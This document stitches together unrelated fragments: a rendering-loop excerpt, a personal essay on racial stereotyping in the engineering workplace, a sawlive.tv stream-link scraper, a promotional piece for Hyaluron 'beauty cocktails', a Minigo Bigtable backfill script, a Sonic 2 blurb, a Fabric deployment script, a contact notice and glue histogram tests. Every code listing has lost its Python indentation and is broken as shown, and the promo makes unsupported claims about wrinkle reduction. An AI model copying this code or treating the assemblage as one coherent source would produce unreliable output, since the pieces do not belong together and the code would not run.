composite_atmosphere = self.resource_manager.get_material_instance("precomputed_atmosphere.composite_atmosphere")
composite_atmosphere.use_program()
above_the_cloud = self.scene_manager.atmosphere.cloud_altitude < main_camera.transform.get_pos()[1]
composite_atmosphere.bind_uniform_data("above_the_cloud", above_the_cloud)
composite_atmosphere.bind_uniform_data("inscatter_power", self.scene_manager.atmosphere.inscatter_power)
composite_atmosphere.bind_uniform_data("texture_atmosphere", RenderTargets.ATMOSPHERE)
composite_atmosphere.bind_uniform_data("texture_inscatter", RenderTargets.ATMOSPHERE_INSCATTER)
composite_atmosphere.bind_uniform_data("texture_linear_depth", RenderTargets.LINEAR_DEPTH)
self.postprocess.draw_elements()
# prepare translucent
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
# Translucent
self.render_translucent()
# render particle
if RenderOption.RENDER_EFFECT:
glDisable(GL_CULL_FACE)
glEnable(GL_BLEND)
self.render_effect()
glDisable(GL_BLEND)
glEnable(GL_CULL_FACE)
# render probe done
if RenderOption.RENDER_LIGHT_PROBE:
return
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.set_blend_state(False)
self.render_postprocess()
if RenderOption.RENDER_OBJECT_ID:
self.render_object_id()
self.render_selected_object()
# debug render target
if self.debug_texture is not None:
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_texture(self.debug_texture)
if RenderOption.RENDER_FONT:
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.render_log()
if RenderOption.RENDER_DEBUG_LINE and self.debug_texture is None:
# render world axis
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
self.render_axis()
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
self.debug_line_manager.render_spline(spline)
self.debug_line_manager.render_debug_lines()
if RenderOption.RENDER_GIZMO and self.debug_texture is None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
# render spline gizmo
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GIZMO,
self.scene_manager.spline_gizmo_render_infos,
self.render_color_material)
# render transform axis gizmo
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.GIZMO)
|
I started my professional career right after college and I immediately recognized in my industry of planning and engineering, African Americans were far and few between. In a city like Baltimore where over 60% of the population is African American I’d think we’d make up more than the handful of professionals I know. On average, I don’t think any of my jobs ever had larger than a 15% rate of African Americans employed in that office.
Now, I was used to being the minority in high school and in college so adjusting to the low numbers in the professional world wasn’t hard, the challenge was adjusting to the stereotypes many colleagues had of me. From white men speaking slang around me to black men making assumptions about my blackness because I was from the suburbs; the judgments were nonstop and came from all angles. I’ve been called aggressive and sensitive in the same conversation by the same person. I’ve been told by a white person that my VP didn’t feel comfortable around me because I was black. And yes, I’ve had people make fried chicken jokes around me and think it was okay because I was “different.” As different as I am, I feel like everyone treats me the same. |
# -*- coding: utf-8 -*-
import re,urllib,urlparse,base64
from liveresolver.modules import client,decryptionUtils
from liveresolver.modules import jsunpack
from liveresolver.modules.log_utils import log
def resolve(url):
try:
page = re.compile('//(.+?)/(?:embed|v)/([0-9a-zA-Z-_]+)').findall(url)[0]
page = 'http://%s/embed/%s' % (page[0], page[1])
try: referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except: referer = page
try: host = urlparse.parse_qs(urlparse.urlparse(url).query)['host'][0]
except: host = 'sawlive.tv'
headers={'User-Agent': client.agent(),'Host': host, 'Referer': referer, 'Connection': 'keep-alive'}
result = client.request(page, referer=referer)
result = decryptionUtils.doDemystify(result)
url = client.parseDOM(result, 'iframe', ret='src')[-1]
url = url.replace(' ', '').replace('+','')
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
for i in range(100):
for v in var: result = result.replace(" %s " % v[0], ' %s '%v[1])
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
for v in var:
if '+' in v[1]:
ss = v[1].rstrip('+').replace('"+','').split('+')
sg = v[1].rstrip('+').replace('"+','')
for s in ss:
sg = sg.replace(s, var_dict[s])
var_dict[v[0]]=sg.replace('+','')
for i in range(100):
for v in var_dict.keys(): url = url.replace("'%s'" % v, var_dict[v])
for v in var_dict.keys(): url = url.replace("(%s)" % v, "(%s)" % var_dict[v])
result = client.request(url, headers = headers)
result = decryptionUtils.doDemystify(result)
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
file = re.compile("'file'\s*(.+?)\)").findall(result)[0]
file = file.replace('\'','')
for v in var_dict.keys():
file = file.replace(v,var_dict[v])
file = file.replace('+','').replace(',','').strip()
log("Sawlive: Found file url: " + file)
try:
log("Sawlive: Finding m3u8 link.")
if not file.startswith('http'): raise Exception()
url = client.request(file, output='geturl')
if not '.m3u8' in url: raise Exception()
url += '|%s' % urllib.urlencode({'User-Agent': client.agent(), 'Referer': file})
log("Sawlive: Found m3u8 link: " + url)
return url
except:
log("Sawlive: m3u8 link not found, finding rtmp.")
pass
strm = re.compile("'streamer'.+?'(.+?)'").findall(result)[0]
swf = re.compile("SWFObject\('(.+?)'").findall(result)[0]
url = '%s playpath=%s swfUrl=%s pageUrl=%s live=1 timeout=60' % (strm, file, swf, url)
url = urllib.unquote(url)
log("Sawlive: rtmp link found: " + url)
return url
except Exception as e:
log("Sawlive exception:\n" + str(e))
log("Sawlive: Resolver failed. Returning...")
return
|
Carche Salon was the perfect setting for the new beauty and healthy cocktails with Hyaluron presented by Riel`s World on Nov 10, 2017. The guests enjoyed their beauty and healthy cocktails al fresco at the Carche Salon's lounge.
The beauty cocktails with Hyaluron were presented by Riel's world a leading company in regards to lifestyle worldwide and have many perks like wrinkle reduction, improved skin hydration, and elasticity, among other benefits. Enjoy the gallery with the event highlights!
Riel's World is a multinational company that operates in many countries around the world by the hands a professional multinational team with expertise in every needed discipline.
Riel’s World is specialized in a wide array of product lines while giving a special focus to their main goal, delighting your senses for what they offer the highest quality available products as they are exotic wines and Champagne, a healthy line with tea, coffee and nutritious products and home fragrances, clothes & accessories.
Their goal is as big as it gets, aiming to be there in every happy moment around the world, celebrating diversity and joy as their main values.
Hair & Beauty Salon: Their location and venue are absolutely fabulous as you can clearly see in the images. decorated with impeccable taste, offering a welcoming atmosphere in a glamorous and discrete setting in the heart of Puerto Banús most stylish area.
They are very much up to date with the latest trends and, listening to your needs, far from the cliché of the hairdresser who does whatever he wants, the team of Carche has the expertise to provide you with a truly relaxing moment in a spirit of trust.
Carche is a highly recommendable Beauty and Health Salon for both men and women. Their staff is respectful, professional and inspired to deliver a tailored style that supports a philosophy of natural beauty enhancement in hair and body care.
The beauty cocktails with Hyaluron were presented by Riel's world a leading company in regards to lifestyle worldwide and have many perks like wrinkle reduction, improved skin hydration and elasticity, among other benefits. Enjoy the gallery with the event highlights!
They are very much up to date with the latest trends and, listening to your needs, far from the cliché of the hairdresser who does whatever he wants, the team of Carche have the expertise to provide you with a truly relaxing moment in a spirit of trust. |
#!/usr/bin/env python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Write Minigo eval_game records to Bigtable.
This is used to backfill eval games from before they were written by
cc-evaluator as part of https://github.com/tensorflow/minigo/pull/709
"""
import sys
sys.path.insert(0, '.')
import itertools
import multiprocessing
import os
import re
from collections import Counter
from absl import app, flags
from google.cloud import bigtable
from google.cloud.bigtable import row_filters
from tqdm import tqdm
from tensorflow import gfile
import sgf_wrapper
from bigtable_input import METADATA, TABLE_STATE
flags.DEFINE_string(
'sgf_glob', None,
'Glob for SGFs to backfill into eval_games bigtable.')
flags.mark_flags_as_required([
'sgf_glob', 'cbt_project', 'cbt_instance', 'cbt_table'
])
FLAGS = flags.FLAGS
# Constants
EVAL_PREFIX = 'e_{:0>10}'
EVAL_GAME_COUNTER = b'eval_game_counter'
SGF_FILENAME = b'sgf'
#### Common Filters
EVAL_COUNT_FILTER = row_filters.ColumnRangeFilter(
METADATA, EVAL_GAME_COUNTER, EVAL_GAME_COUNTER)
#### START ####
def grouper(iterable, n):
iterator = iter(iterable)
group = tuple(itertools.islice(iterator, n))
while group:
yield group
group = tuple(itertools.islice(iterator, n))
def latest_game_number(bt_table):
"""Return the number of the last game to be written."""
# TODO(amj): Update documentation on latest_game_number (last game or next game)?
table_state = bt_table.read_row(TABLE_STATE, filter_=EVAL_COUNT_FILTER)
if table_state is None:
return 0
value = table_state.cell_value(METADATA, EVAL_GAME_COUNTER)
# see bigtable_input.py cbt_intvalue(...)
return int.from_bytes(value, byteorder='big')
def read_existing_paths(bt_table):
"""Return the SGF filename for each existing eval record."""
rows = bt_table.read_rows(
filter_=row_filters.ColumnRangeFilter(
METADATA, SGF_FILENAME, SGF_FILENAME))
names = (row.cell_value(METADATA, SGF_FILENAME).decode() for row in rows)
processed = [os.path.splitext(os.path.basename(r))[0] for r in names]
return processed
def canonical_name(sgf_name):
"""Keep filename and some date folders"""
sgf_name = os.path.normpath(sgf_name)
assert sgf_name.endswith('.sgf'), sgf_name
# Strip off '.sgf'
sgf_name = sgf_name[:-4]
# Often eval is inside a folder with the run name.
# include from folder before /eval/ if part of path.
with_folder = re.search(r'/([^/]*/eval/.*)', sgf_name)
if with_folder:
return with_folder.group(1)
# Return the filename
return os.path.basename(sgf_name)
def process_game(path):
with open(path) as f:
sgf_contents = f.read()
root_node = sgf_wrapper.get_sgf_root_node(sgf_contents)
assert root_node.properties['FF'] == ['4'], ("Bad game record", path)
result = root_node.properties['RE'][0]
assert result.lower()[0] in 'bw', result
assert result.lower()[1] == '+', result
black_won = result.lower()[0] == 'b'
length = 0
node = root_node.next
while node:
props = node.properties
length += 1 if props.get('B') or props.get('W') else 0
node = node.next
sgf_path = canonical_name(path)
return (
(b"black", root_node.properties['PB'][0]),
(b"white", root_node.properties['PW'][0]),
# All values are strings, "1" for true and "0" for false here
(b"black_won", '1' if black_won else '0'),
(b"white_won", '0' if black_won else '1'),
(b"result", result),
(b"length", str(length)),
(b"sgf", sgf_path),
(b"tag", ""),
(b"tool", "eval_sgf_to_cbt"),
)
def read_games(glob, existing_paths):
"""Read all SGFs that match glob
Parse each game and extract relevant metadata for eval games table.
"""
globbed = sorted(gfile.Glob(glob))
skipped = 0
to_parse = []
for sgf_name in tqdm(globbed):
assert sgf_name.lower().endswith('.sgf'), sgf_name
sgf_path = canonical_name(sgf_name)
sgf_filename = os.path.basename(sgf_path)
if sgf_path in existing_paths or sgf_filename in existing_paths:
skipped += 1
continue
to_parse.append(sgf_name)
game_data = []
with multiprocessing.Pool() as pool:
game_data = pool.map(process_game, tqdm(to_parse), 100)
print("Read {} SGFs, {} new, {} existing".format(
len(globbed), len(game_data), skipped))
return game_data
def write_eval_records(bt_table, game_data, last_game):
"""Write all eval_records to eval_table
In addition to writing new rows table_state must be updated in
row `table_state` columns `metadata:eval_game_counter`
Args:
bt_table: bigtable table to add rows to.
game_data: metadata pairs (column name, value) for each eval record.
last_game: last_game in metadata:table_state
"""
eval_num = last_game
# Each column counts as a mutation so max rows is ~10000
GAMES_PER_COMMIT = 2000
for games in grouper(tqdm(game_data), GAMES_PER_COMMIT):
assert bt_table.read_row(EVAL_PREFIX.format(eval_num)), "Prev row doesn't exists"
assert bt_table.read_row(EVAL_PREFIX.format(eval_num+1)) is None, "Row already exists"
rows = []
for i, metadata in enumerate(games):
eval_num += 1
row_name = EVAL_PREFIX.format(eval_num)
row = bt_table.row(row_name)
for column, value in metadata:
row.set_cell(METADATA, column, value)
rows.append(row)
# For each batch of games print a couple of the rows being added.
if i < 5 or i + 5 > len(games):
print("\t", i, row_name, metadata[6][1])
if eval_num == last_game + len(games):
test = input("Commit ('y'/'yes' required): ")
if test.lower() not in ('y', 'yes'):
break
# TODO(derek): Figure out how to condition on atomic counter update.
# Condition all updates on the current value of last_game
game_num_update = bt_table.row(TABLE_STATE)
game_num_update.set_cell(METADATA, EVAL_GAME_COUNTER, eval_num)
print(TABLE_STATE, eval_num)
response = bt_table.mutate_rows(rows)
# validate that all rows written successfully
any_bad = False
for i, status in enumerate(response):
if status.code is not 0:
print("Row number {} failed to write {}".format(i, status))
any_bad = True
if any_bad:
break
game_num_update.commit()
def main(unusedargv):
"""All of the magic together."""
del unusedargv
bt_table = (bigtable
.Client(FLAGS.cbt_project, admin=True)
.instance(FLAGS.cbt_instance)
.table(FLAGS.cbt_table))
assert bt_table.exists(), "Table doesn't exist"
# Get current game counter, updates are conditioned on this matching.
last_game = latest_game_number(bt_table)
print("eval_game_counter:", last_game)
print()
# Get existing SGF paths so we avoid uploading duplicates
existing_paths = read_existing_paths(bt_table)
print("Found {} existing".format(len(existing_paths)))
if existing_paths:
duplicates = Counter(existing_paths)
existing_paths = set(existing_paths)
for k, v in duplicates.most_common():
if v == 1:
break
print("{}x{}".format(v, k))
print("\tmin:", min(existing_paths))
print("\tmax:", max(existing_paths))
print()
# Get all SGFs that match glob, skipping SGFs with existing records.
data = read_games(FLAGS.sgf_glob, existing_paths)
if data:
write_eval_records(bt_table, data, last_game)
if __name__ == "__main__":
app.run(main)
|
Dr. Eggman (aka Dr. Robotnik) is back to continue his zealous search for the Chaos Emeralds needed to fuel his new Death Egg contraption. The evil doctor secretly follows Sonic to his vacation spot, Westside Island, and launches a full-scale attack, imprisoning all the helpless animals of the island and turning them into mindless worker drones.
Now Sonic must thwart the doctor’s plans at all costs. This time he isn’t alone, as a peculiar two-tailed fox named Miles Prower (aka Tails) decides to aid him in the battle. Together they must locate the Chaos Emeralds before Dr. Eggman does, and put an end to his diabolical scheme.
I don't understand why after 20 years and praises Sonic The Hedgehog 2 suddenly some detractors come out.
In short, I personally love it!
Casino Street Zone music. Nuff said. |
from fabric.api import run, cd, sudo, roles, runs_once, env
from fabric.contrib.files import first
# add a local_fab_settings.py file,
# so that you can access your servers
# but please, don't commit it to git.
try:
from local_fab_settings import *
except ImportError as e:
pass
env.venv_roots = ['/oknesset_web/oknesset/', '/oknesset_data/oknesset/']
env.project_dir = 'Open-Knesset'
env.ok_user = 'oknesset'
def _venv_root():
return first(*env.venv_roots)
def _project_root():
return _venv_root() + env.project_dir
def _activate():
return 'source ' + _venv_root() + 'bin/activate'
def virtualenv(command):
with cd(_project_root()):
sudo(_activate() + ' && ' + command, user=env.ok_user)
# web server stuff
def web_apache_cmd(cmd):
if cmd not in ['start', 'stop', 'restart']:
raise Exception('Unknown apache command %s' % cmd)
sudo('/etc/init.d/apache2 %s' % cmd)
def restart_oknesset():
sudo('supervisorctl restart oknesset')
def _update_commit():
with cd(_project_root()):
sudo(
'git log --pretty=format:"Code Commit: %H <br>Last Update: %cd" -n 1 > templates/last_build.txt',
user=env.ok_user)
def _chown(to_user, directory=env.project_dir):
sudo("chown -R %s %s" % (to_user, directory))
@roles('web')
def deploy_web(requirements=False):
web_apache_cmd('stop')
with cd(_venv_root()):
_chown(env.ok_user)
with cd(env.project_dir):
_git_pull()
if requirements:
_install_requirements()
virtualenv('./manage.py collectstatic --noinput')
_update_commit()
#_chown('www-data')
restart_oknesset()
web_apache_cmd('start')
# db server stuff - should only run once on master db!
@runs_once
def db_migrate_syncdb():
virtualenv('./manage.py migrate')
@roles('db')
def deploy_backend(migration=False, requirements=False):
with cd(_project_root()):
_git_pull()
if requirements:
_install_requirements()
if migration:
db_migrate_syncdb()
@roles('db_master')
def show_cron(as_user=env.ok_user):
sudo('crontab -l', user=as_user)
@roles('db')
def db_show_replication():
# works on both servers
run('ps -ef | grep postgres | grep -e receiver -e sender')
# memcache commands
@roles('web')
@runs_once
def mc_flushall():
#run('echo flush_all | telnet localhost 11211')
virtualenv(
"DJANGO_SETTINGS_MODULE='knesset.settings' " +
"python -c 'from django.core.cache import cache; cache.clear()'"
)
# commands for all servers
def _git_pull(repo='origin', branch='master', as_user=env.ok_user):
sudo("git pull %s %s" % (repo, branch), user=as_user)
def _install_requirements():
virtualenv(
'cd .. && pip install -r ' +
env.project_dir + '/requirements.txt && cd ' + _project_root())
@roles('all')
def all_upgrade_system():
sudo('apt-get update')
sudo('apt-get upgrade')
@roles('all')
def show_updates():
sudo('cat /var/lib/update-notifier/updates-available')
sudo('/usr/lib/update-notifier/update-motd-reboot-required')
@roles('all')
def all_run_cmd(cmd):
run(cmd)
@roles('all')
def all_sudo_cmd(cmd):
sudo(cmd)
def deploy_all(repo='origin', branch='master', install_requirements=False, use_migration=False, reset_memcache=False):
deploy_backend(requirements=install_requirements, migration=use_migration)
deploy_web(requirements=install_requirements)
if reset_memcache:
mc_flushall()
|
To ask us a question about our services you can contact Tritech Ground Engineering Ltd. using the contact form below.
You can also write to us or send us a fax using the contact details provided, or of course please telephone us on 01204 675109. We aim to respond to all online enquiries, if appropriate, within 1 working day. |
#pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
import pytest
from mock import MagicMock
import matplotlib.pyplot as plt
import numpy as np
from ..histogram_client import HistogramClient
from ..layer_artist import HistogramLayerArtist
from ...core.data_collection import DataCollection
from ...core.exceptions import IncompatibleDataException
from ...core.hub import Hub
from ...core.data import Data
from ...core.subset import RangeSubsetState
FIGURE = plt.figure()
plt.close('all')
class TestException(Exception):
pass
class TestHistogramClient(object):
def setup_method(self, method):
self.data = Data(x=[0, 0, 0, 1, 2, 3, 3, 10, 20],
y=[-1, -1, -1, -2, -2, -2, -3, -5, -10])
self.subset = self.data.new_subset()
self.collect = DataCollection(self.data)
self.client = HistogramClient(self.collect, FIGURE)
self.axes = self.client.axes
FIGURE.canvas.draw = MagicMock()
assert FIGURE.canvas.draw.call_count == 0
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def layer_drawn(self, layer):
return layer in self.client._artists and \
all(a.visible for a in self.client._artists[layer]) and \
all(len(a.artists) > 0 for a in self.client._artists[layer])
def layer_present(self, layer):
return layer in self.client._artists
def assert_autoscaled(self):
yra = self.client.axes.get_ylim()
datara = [99999, -99999]
for a in self.client._artists:
y = a.y
if a.y.size > 0:
datara[0] = min(datara[0], a.y.min())
datara[1] = max(datara[1], a.y.max())
np.testing.assert_array_almost_equal(yra[0], 0)
np.testing.assert_array_almost_equal(datara[1], yra[1])
def test_empty_on_creation(self):
assert self.data not in self.client._artists
def test_add_layer(self):
self.client.add_layer(self.data)
assert self.layer_present(self.data)
assert not self.layer_drawn(self.data)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_add_invalid_layer_raises(self):
self.collect.remove(self.data)
with pytest.raises(IncompatibleDataException) as exc:
self.client.add_layer(self.data)
def test_add_subset_auto_adds_data(self):
subset = self.data.new_subset()
self.client.add_layer(subset)
assert self.layer_present(self.data)
assert self.layer_present(subset)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_double_add_ignored(self):
self.client.add_layer(self.data)
art = self.client._artists[self.data]
self.client.add_layer(self.data)
assert self.client._artists[self.data] == art
def test_add_data_auto_adds_subsets(self):
s = self.data.new_subset()
self.client.add_layer(self.data)
assert self.layer_present(s)
def test_data_removal(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
assert not (self.layer_present(self.data))
def test_data_removal_removes_subsets(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
s = self.data.new_subset()
assert len(self.data.subsets) > 0
for subset in self.data.subsets:
assert not (self.layer_present(subset))
def test_layer_updates_on_data_add(self):
self.client.add_layer(self.data)
for s in self.data.subsets:
assert s in self.client._artists
def test_set_component_updates_component(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
self.client.set_component(comp)
assert self.client._component is comp
def test_set_component_redraws(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
ct0 = self.draw_count()
self.client.set_component(comp)
assert self.draw_count() > ct0
def test_remove_not_present_ignored(self):
self.client.remove_layer(self.data)
def test_set_visible_external_data(self):
self.client.set_layer_visible(None, False)
def test_get_visible_external_data(self):
assert not (self.client.is_layer_visible(None))
def test_set_visible(self):
self.client.add_layer(self.data)
self.client.set_layer_visible(self.data, False)
assert not (self.client.is_layer_visible(self.data))
def test_draw_histogram_one_layer(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_subset_hidden(self):
self.client.add_layer(self.data)
s = self.data.new_subset()
self.client.set_layer_visible(s, False)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_two_layers(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_update_property_set_triggers_redraw(self):
self.client.add_layer(self.data)
ct = self.draw_count()
self.client.normed ^= True
assert self.draw_count() > ct
@pytest.mark.parametrize(('prop'), ['normed', 'cumulative'])
def test_set_boolean_property(self, prop):
"""Boolean properties should sync with artists"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
setattr(self.client, prop, False)
for a in self.client._artists:
assert not getattr(a, prop)
setattr(self.client, prop, True)
for a in self.client._artists:
assert getattr(a, prop)
def test_set_nbins(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.nbins = 100
for a in self.client._artists[self.data]:
assert a.nbins == 100
assert a.x.size == 100 + 1
def test_autoscale(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.axes.set_ylim(0, .1)
self.client.autoscale = False
self.client.autoscale = True
self.assert_autoscaled()
def test_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = -12, 20
assert self.client.xlimits == (-12, 20)
for a in self.client._artists[self.data]:
assert a.lo == -12
assert a.hi == 20
def test_set_xlimits_out_of_data_range(self):
"""Setting xlimits outside of range shouldn't crash"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 100, 200
self.client.xlimits = -200, -100
def test_component_property(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
assert self.client.component is self.data.components[0]
def test_apply_roi(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 1
assert state.hi == 3
def test_apply_roi_xlog(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
self.client.xlog = True
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 10
assert state.hi == 1000
def test_xlimits_sticky_with_component(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 5, 6
self.client.set_component(self.data.components[1])
self.client.xlimits = 7, 8
self.client.set_component(self.data.components[0])
assert self.client.xlimits == (5, 6)
self.client.set_component(self.data.components[1])
assert self.client.xlimits == (7, 8)
def test_default_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
assert self.client.xlimits == (0, 20)
self.client.set_component(self.data.id['y'])
assert self.client.xlimits == (-10, -1)
def test_xlimit_single_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = (None, 5)
assert self.client.xlimits == (0, 5)
self.client.xlimits = (3, None)
assert self.client.xlimits == (3, 5)
def test_xlimit_reverse_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = 5, 3
assert self.client.xlimits == (3, 5)
def test_xlog_axes_labels(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlog = True
assert self.client.axes.get_xlabel() == 'Log x'
self.client.xlog = False
assert self.client.axes.get_xlabel() == 'x'
self.client.ylog = True
assert self.client.axes.get_ylabel() == 'N'
self.client.ylog = False
assert self.client.axes.get_ylabel() == 'N'
def test_xlog_snaps_limits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.axes.set_xlim((-1, 1))
self.client.xlog = True
assert self.client.axes.get_xlim() != (-1, 1)
def test_artist_clear_resets_arrays(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
for a in self.client._artists[self.data]:
assert a.get_data()[0].size > 0
a.clear()
assert a.get_data()[0].size == 0
class TestCommunication(object):
def setup_method(self, method):
self.data = Data(x=[1, 2, 3, 2, 2, 3, 1])
figure = MagicMock()
self.collect = DataCollection()
self.client = HistogramClient(self.collect, figure)
self.axes = self.client.axes
self.hub = Hub()
self.connect()
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def connect(self):
self.client.register_to_hub(self.hub)
self.collect.register_to_hub(self.hub)
def test_ignore_data_add_message(self):
self.collect.append(self.data)
assert not (self.client.layer_present(self.data))
def test_update_data_ignored_if_data_not_present(self):
self.collect.append(self.data)
ct0 = self.draw_count()
self.data.style.color = 'blue'
assert self.draw_count() == ct0
def test_update_data_processed_if_data_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
ct0 = self.draw_count()
self.data.style.color = 'blue'
assert self.draw_count() > ct0
def test_add_subset_ignored_if_data_not_present(self):
self.collect.append(self.data)
ct0 = self.draw_count()
sub = self.data.new_subset()
assert not (self.client.layer_present(sub))
def test_add_subset_processed_if_data_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
assert (self.client.layer_present(sub))
def test_update_subset_ignored_if_not_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
self.client.remove_layer(sub)
ct0 = self.draw_count()
sub.style.color = 'blue'
assert self.draw_count() == ct0
def test_update_subset_processed_if_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
ct0 = self.draw_count()
sub.style.color = 'blue'
assert self.draw_count() > ct0
def test_data_remove_message(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
self.collect.remove(self.data)
assert not self.client.layer_present(self.data)
def test_subset_remove_message(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
assert self.client.layer_present(sub)
sub.delete()
assert not self.client.layer_present(sub)
class TestHistogramLayerArtist(object):
def setup_subset(self):
ax = MagicMock()
d = Data(x=[1, 2, 3])
s = d.new_subset()
s.subset_state = d.id['x'] > 1
self.artist = HistogramLayerArtist(s, ax)
def setup_hist_calc_counter(self):
self.setup_subset()
m = MagicMock()
self.artist._calculate_histogram = m
return m
def setup_hist_scale_counter(self):
self.setup_subset()
m = MagicMock()
self.artist._scale_histogram = m
self.artist._calculate_histogram = MagicMock()
return m
def test_calculate_histogram_efficient(self):
ct = self.setup_hist_calc_counter()
self.artist.update()
assert ct.call_count == 1
self.artist.update()
assert ct.call_count == 1
def test_recalc_on_state_changes(self):
ct = self.setup_hist_calc_counter()
assert ct.call_count == 0
self.artist.update()
assert ct.call_count == 1
#lo
self.artist.lo -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 2
#hi
self.artist.hi -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 3
#nbins
self.artist.nbins += 1
self.artist.update()
self.artist.update()
assert ct.call_count == 4
#xlog
self.artist.xlog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#ylog -- no call
self.artist.ylog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#cumulative -- no call
self.artist.cumulative ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#normed -- no call
self.artist.normed ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#subset style -- no call
self.artist.layer.style.color = '#00ff00'
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#subset state
self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
self.artist.update()
self.artist.update()
assert ct.call_count == 6
def test_rescale_on_state_changes(self):
ct = self.setup_hist_scale_counter()
assert ct.call_count == 0
self.artist.update()
self.artist.update()
assert ct.call_count == 1
#lo
self.artist.lo -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 2
#hi
self.artist.hi -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 3
#nbins
self.artist.nbins += 1
self.artist.update()
self.artist.update()
assert ct.call_count == 4
#xlog
self.artist.xlog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#ylog
self.artist.ylog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 6
#cumulative
self.artist.cumulative ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 7
#normed
self.artist.normed ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 8
#subset state
self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
self.artist.update()
self.artist.update()
assert ct.call_count == 9
#subset style -- no call
self.artist.layer.style.color = '#00ff00'
self.artist.update()
self.artist.update()
assert ct.call_count == 9
|
